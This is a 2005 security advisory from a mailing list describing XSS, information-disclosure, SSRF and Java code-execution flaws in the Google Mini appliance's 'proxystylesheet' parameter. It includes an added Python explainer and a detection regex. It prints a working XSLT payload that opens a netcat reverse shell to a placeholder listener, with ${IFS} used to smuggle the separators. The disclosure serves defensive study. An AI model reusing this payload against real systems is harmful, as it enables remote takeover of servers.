Network Security Exploits-HackingTools
Subject: [NEWS] Google Search Appliance Proxystylesheet XSLT Multiple Vulnerabilities (XSS, Information disclosure, Java Code Execution)
Date: 21 Nov 2005 16:18:38 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Google Search Appliance Proxystylesheet XSLT Multiple Vulnerabilities 
(XSS, Information disclosure, Java Code Execution)
------------------------------------------------------------------------


SUMMARY

"The Google Mini <http://www.google.com/enterprise/> offers cost-effective, 
high-quality search for your public website or intranet."

By supplying a malicious XSLT style sheet through the 'proxystylesheet' 
request parameter, a remote attacker can execute arbitrary programs on the 
Google Mini appliance, retrieve system information, or perform cross-site 
scripting against users of its search interface.

DETAILS

Vulnerable Systems:
 * Google Mini Search Appliance

The Google Search Appliance allows customization of the search interface 
through XSLT style sheets. Certain versions of the appliance allow a 
remote URL to be supplied as the path to the XSLT style sheet. This 
feature can be abused to perform cross-site scripting (XSS), file 
discovery, service enumeration, and arbitrary command execution.

The Google Search Appliance search interface uses the 'proxystylesheet' 
form variable to determine which style sheet to apply to the search 
results. This variable can be a local file name or an HTTP URL, and it is 
entirely under the control of whoever crafts the search request.

Error Message XSS:
A cross-site scripting flaw can be exploited by providing a snippet of 
malicious JavaScript code as the value of the proxystylesheet variable. The 
appliance looks for a local style sheet by that name, fails, and echoes the 
supplied value unencoded in the resulting error message, so the script runs 
in the browser of whoever follows the crafted search URL.

XSLT Style Sheet XSS:
A cross-site scripting flaw can also be exploited by hosting a malicious XSLT 
style sheet and specifying its URL in the proxystylesheet parameter. The 
appliance downloads the style sheet, applies it to the search results, and 
serves the resulting page, including any JavaScript the style sheet emits, 
from its own origin to the user who executed the search.

Information disclosure 1:
It is possible to determine whether any file exists on the system by 
supplying a relative path that traverses out of the style sheet directory 
as the proxystylesheet value. The error message returned by the server 
differs depending on whether the path was valid, which turns the appliance 
into a file-existence oracle that can be used to fingerprint the base 
operating system and kernel version.

Information disclosure 2:
A rudimentary port scan can be performed by supplying HTTP URLs that point 
at a target host and individual ports on that host. The error message 
returned by the server differs between open and closed ports, so the 
appliance acts as a scanning proxy into whatever networks it can reach 
(what would now be called server-side request forgery). The appliance 
refuses requests that connect back to itself, but no other restrictions 
apply.

XSLT Java Code Execution:
It is possible to execute arbitrary Java class methods on the appliance by 
creating a malicious XSLT style sheet and pointing the proxystylesheet 
parameter at it. System commands run as an unprivileged user, which, 
combined with the vulnerable kernel version disclosed through the 
file-existence check above, can lead to a remote root shell. The appliance 
uses the Saxon XSLT processor, whose Java extension-function binding lets a 
style sheet call java.lang.System and java.lang.Runtime directly, so the 
following snippet works:

<!-- Google Mini XSLT Code Execution [metasploit] -->
<!-- Saxon binds a namespace prefix whose URI is "java:<class>" to that Java
     class, so the sys: and run: functions below are direct calls to
     java.lang.System and java.lang.Runtime. -->
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:sys="java:java.lang.System"
    xmlns:run="java:java.lang.Runtime">
  <xsl:template match="/">
    <span>
XSLT Version: <xsl:value-of select="system-property('xsl:version')"/>
<br/>
XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')"/>
<br/>
XSLT URL: <xsl:value-of select="system-property('xsl:vendor-url')"/>
<br/>
OS: <xsl:value-of select="sys:getProperty('os.name')"/>
<br/>
Version: <xsl:value-of select="sys:getProperty('os.version')"/>
<br/>
Arch: <xsl:value-of select="sys:getProperty('os.arch')"/>
<br/>
UserName: <xsl:value-of select="sys:getProperty('user.name')"/>
<br/>
UserHome: <xsl:value-of select="sys:getProperty('user.home')"/>
<br/>
UserDir: <xsl:value-of select="sys:getProperty('user.dir')"/>
<br/>

Executing command...<br/>
<!-- Runtime.exec(String) splits its argument on whitespace, so the shell
     command carries its separators as ${IFS}; 255.255.255.255 port 53 is
     the placeholder for the attacker's listener. -->
<xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc${IFS}255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53')"/>
    </span>
  </xsl:template>
</xsl:stylesheet>
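The command string in the snippet above contains no literal space after 'sh -c', and every separator inside the shell command is written as ${IFS}. That is forced by java.lang.Runtime.exec(String), which splits its argument on whitespace with no notion of quoting: written with ordinary spaces, 'sh -c nc host 53 ...' would hand sh the one-word script 'nc' and push the rest into positional parameters. The following Python is an added example (not from this advisory or from Metasploit) that models the JVM's tokenization and the subsequent sh field splitting of an unquoted ${IFS} under the default IFS, and adds the detection pattern a log filter would use. It executes nothing, it handles only the '|' and ${IFS} constructs the payload relies on, and the listener address is the advisory's own placeholder.

```python
import re

# Delimiters of java.util.StringTokenizer's default constructor, which is what
# java.lang.Runtime.exec(String) uses to split a command line into argv.
# There is no quoting: any run of these characters ends the current argument.
JAVA_TOKENIZER_DELIMS = " \t\n\r\f"

# Default IFS of a POSIX sh: space, tab, newline.
DEFAULT_IFS = " \t\n"

# The advisory's command string, with its placeholder listener address.
ADVISORY_PAYLOAD = "sh -c nc${IFS}255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53"
# The same command written with ordinary spaces.
NAIVE_PAYLOAD = "sh -c nc 255.255.255.255 53|sh|nc 255.255.255.255 53"

# Detection signature: ${IFS} or $IFS used as a separator smuggled past a
# whitespace-tokenizing exec() or a space-stripping filter.
IFS_SMUGGLING = re.compile(r"\$\{?IFS\}?")


def runtime_exec_argv(cmdline):
    """Model of Runtime.exec(String): the argv the JVM actually builds."""
    pattern = "[" + re.escape(JAVA_TOKENIZER_DELIMS) + "]+"
    return [tok for tok in re.split(pattern, cmdline) if tok]


def sh_c_pipeline(argv):
    """Model of what 'sh -c <script>' does with the script under default IFS.

    Deliberately minimal: only '|' pipelines and unquoted ${IFS} expansion
    with field splitting are handled, which is all the advisory payload
    relies on. Nothing is executed. Returns one argv list per pipeline stage.
    """
    if len(argv) < 3 or argv[:2] != ["sh", "-c"]:
        raise ValueError("expected an 'sh -c <script>' command line")
    script = argv[2]  # argv[3:] only become $0, $1, ...; sh never runs them
    stages = []
    for stage in script.split("|"):
        # An unquoted ${IFS} expands to the IFS characters themselves, and the
        # expansion result is then field-split on those same characters.
        expanded = stage.replace("${IFS}", DEFAULT_IFS)
        stages.append(expanded.split())
    return stages


def uses_ifs_smuggling(text):
    """True if the text carries ${IFS}/$IFS as a whitespace substitute."""
    return IFS_SMUGGLING.search(text) is not None


if __name__ == "__main__":
    for label, cmd in (("naive", NAIVE_PAYLOAD), ("advisory", ADVISORY_PAYLOAD)):
        argv = runtime_exec_argv(cmd)
        print(label, "argv:", argv)
        print(label, "pipeline sh sees:", sh_c_pipeline(argv))
```

The naive form collapses to a single stage running bare 'nc'; the advisory form reaches sh as one argument and only becomes three separate words per stage inside the shell. The same IFS_SMUGGLING pattern is worth applying to any style sheet or query value the appliance is asked to fetch, since a legitimate XSLT has no reason to contain it.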

Vendor Status:
The vendor has issued a fix for customers.


ADDITIONAL INFORMATION

The information has been provided by H D Moore <fdlist@digitaloffense.net>.
The original article can be found at:
http://metasploit.com/research/vulns/google_proxystylesheet/
OSVDB advisories can be found at:
http://osvdb.org/20977, http://osvdb.org/20978, http://osvdb.org/20979, 
http://osvdb.org/20980, http://osvdb.org/20981
Google's Mini appliance security issues can be found at:
http://www.google.com/support/gsa/bin/answer.py?answer=15857



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 



